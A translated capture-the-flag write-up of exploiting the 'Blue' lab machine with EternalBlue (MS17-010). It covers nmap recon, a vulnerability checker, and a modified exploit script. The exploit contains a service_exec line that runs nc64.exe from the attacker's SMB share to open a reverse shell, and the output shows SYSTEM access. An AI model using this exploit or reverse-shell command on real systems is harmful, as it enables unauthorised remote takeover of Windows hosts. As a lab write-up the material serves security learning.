This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.
Description
In this post, we exploit the Blue machine with the NSA’s famous EternalBlue tool, which targets SMBv1. This vulnerability was assigned CVE-2017-0144. I had wanted to exploit it because of its history and to see how critical it is, as it grants the highest possible Windows privileges remotely.
nmap -sCV -O -p135,139,445,49152,49153,49154,49155,49156,49157 -oN Objetivos10.10.10.40 Nmap scan report for10.10.10.40 Host is up (0.096s latency).
PORTSTATESERVICEVERSION 135/tcp open msrpc MicrosoftWindowsRPC 139/tcp open netbios-ssn MicrosoftWindows netbios-ssn 445/tcp open microsoft-ds Windows7Professional7601ServicePack1 microsoft-ds (workgroup:WORKGROUP) 49152/tcp open msrpc MicrosoftWindowsRPC 49153/tcp open msrpc MicrosoftWindowsRPC 49154/tcp open msrpc MicrosoftWindowsRPC 49155/tcp open msrpc MicrosoftWindowsRPC 49156/tcp open msrpc MicrosoftWindowsRPC 49157/tcp open msrpc MicrosoftWindowsRPC Warning: OSScan results may be unreliable because we could not find at least 1 open and1 closed port AggressiveOSguesses:MicrosoftWindows7orWindowsServer2008R2 (97%), MicrosoftWindowsHomeServer2011 (WindowsServer2008R2) (96%), MicrosoftWindowsServer2008SP1 (96%), MicrosoftWindowsServer2008SP2 (96%), MicrosoftWindows7 (96%), MicrosoftWindows7SP0 - SP1orWindowsServer2008 (96%), MicrosoftWindows7SP0 - SP1, WindowsServer2008SP1, WindowsServer2008R2, Windows8, orWindows8.1Update1 (96%), MicrosoftWindows7SP1 (96%), MicrosoftWindows7Ultimate (96%), MicrosoftWindows7UltimateSP1orWindows8.1Update1 (96%) No exact OS matches for host (test conditions non-ideal). NetworkDistance: 2 hops ServiceInfo: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: | smb2-security-mode: | 2.1: |_ Message signing enabled but not required | smb2-time: | date: 2022-07-12T14:04:49 |_ start_date:2022-07-12T13:06:26 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OSCPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: haris-PC | NetBIOS computer name:HARIS-PC\x00 | Workgroup: WORKGROUP\x00 |_ Systemtime:2022-07-12T15:04:51+01:00 |_clock-skew: mean: -19m54s, deviation: 34m35s, median: 3s
The operating system is Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1). The machine is practically screaming EternalBlue, an NSA tool leaked by the Shadow Brokers hacking group.
We can use Nmap to check whether SMB is vulnerable with --script smb-vuln-ms17-010.
nmap -p445 --script smb-vuln-ms17-01010.10.10.40 -oN EternalBlueChecker StartingNmap7.92 ( https://nmap.org ) at 2022-08-05 01:25 CEST Nmap scan report for 10.10.10.40 Host is up (0.039s latency). PORT STATE SERVICE 445/tcp open microsoft-ds
Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Riskfactor:HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosuredate:2017-03-14 | References: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
It is vulnerable!
Exploitation
Exploitation with EternalBlue
Repository
This GitHub repository contains the main exploits derived from EternalBlue and includes a checker that determines whether the target is vulnerable.
from mysmb import MYSMB from impacket import smb, smbconnection, nt_errors from impacket.uuid import uuidtup_to_bin from impacket.dcerpc.v5.rpcrt import DCERPCException from struct import pack import sys
''' Script for - check target if MS17-010 is patched or not. - find accessible named pipe '''
❯ python2 checker.py 10.10.10.40 Target OS: Windows 7 Professional 7601 Service Pack 1 The target is not patched
=== Testing named pipes === spoolss: STATUS_OBJECT_NAME_NOT_FOUND samr: Ok (64 bit) netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint)) lsarpc: Ok (64 bit) browser: Ok (64 bit)
Perfect! We can now run EternalBlue to gain access.
Modifying the Script
Before using the exploit, we modify zzz_exploit.py to change the malicious code that will run and establish a reverse shell.
#!/usr/bin/python from impacket import smb, smbconnection from mysmb import MYSMB from struct import pack, unpack, unpack_from import sys import socket import time
''' MS17-010 exploit for Windows 2000 and later by sleepya Note: - The exploit should never crash a target (chance should be nearly 0%) - The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed Tested on: - Windows 2016 x64 - Windows 10 Pro Build 10240 x64 - Windows 2012 R2 x64 - Windows 8.1 x64 - Windows 2008 R2 SP1 x64 - Windows 7 SP1 x64 - Windows 2008 SP1 x64 - Windows 2003 R2 SP2 x64 - Windows XP SP2 x64 - Windows 8.1 x86 - Windows 7 SP1 x86 - Windows 2008 SP1 x86 - Windows 2003 SP2 x86 - Windows XP SP3 x86 - Windows 2000 SP4 x86 '''
USERNAME = 'guest' PASSWORD = ''
2- Make the machine connect to our Samba server, where we are sharing a Netcat binary that will execute and send us a reverse shell.
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') service_exec(conn, r'cmd /c \\10.10.16.5\smbFolder\nc64.exe -e cmd 10.10.16.5 1234') # Note: There Are Many Methods To Get Shell Over Smb Admin Session # A Simple Method To Get Shell (But Easily To Be Detected By Av) Is # Executing Binary Generated By "Msfvenom -F Exe-Service ..."
❯ python2 zzz_exploit.py 10.10.10.40 samr TargetOS: Windows7Professional7601ServicePack1 Target is 64 bit Got frag size:0x10 GROOM_POOL_SIZE: 0x5030 BRIDE_TRANS_SIZE: 0xfa0 No transaction struct in leak data leak failed... try again CONNECTION: 0xfffffa800443b950 SESSION: 0xfffff8a00853c8e0 FLINK: 0xfffff8a003e17088 InParam: 0xfffff8a003df615c MID: 0x30b unexpected alignment, diff:0x20088 leak failed... try again CONNECTION: 0xfffffa800443b950 SESSION: 0xfffff8a00853c8e0 FLINK: 0xfffff8a001726048 InParam: 0xfffff8a003e2915c MID: 0x30b unexpected alignment, diff: 0x-2703fb8 leak failed... try again CONNECTION: 0xfffffa800443b950 SESSION: 0xfffff8a00853c8e0 FLINK: 0xfffff8a003e3b088 InParam: 0xfffff8a003e3515c MID: 0x303 success controlling groom transaction modify trans1 struct for arbitrary read/write make this SMB session to be SYSTEM overwriting session security context OpeningSVCManager on 10.10.10.40..... Creating service Zgsk..... Starting service Zgsk..... TheNETBIOS connection with the remote host timed out. Removing service Zgsk..... ServiceExecErroron:10.10.10.40 nca_s_proto_error
6- Confirm that the reverse shell connected successfully.
1 2 3 4 5 6 7 8 9 10
❯ rlwrap nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.16.5] from (UNKNOWN) [10.10.10.40] 49166 MicrosoftWindows [Version6.1.7601] Copyright (c) 2009MicrosoftCorporation. All rights reserved.
whoami nt authority\system
C:\Windows\system32>
7- We are nt authority\system! Perfect, we can now retrieve the flags.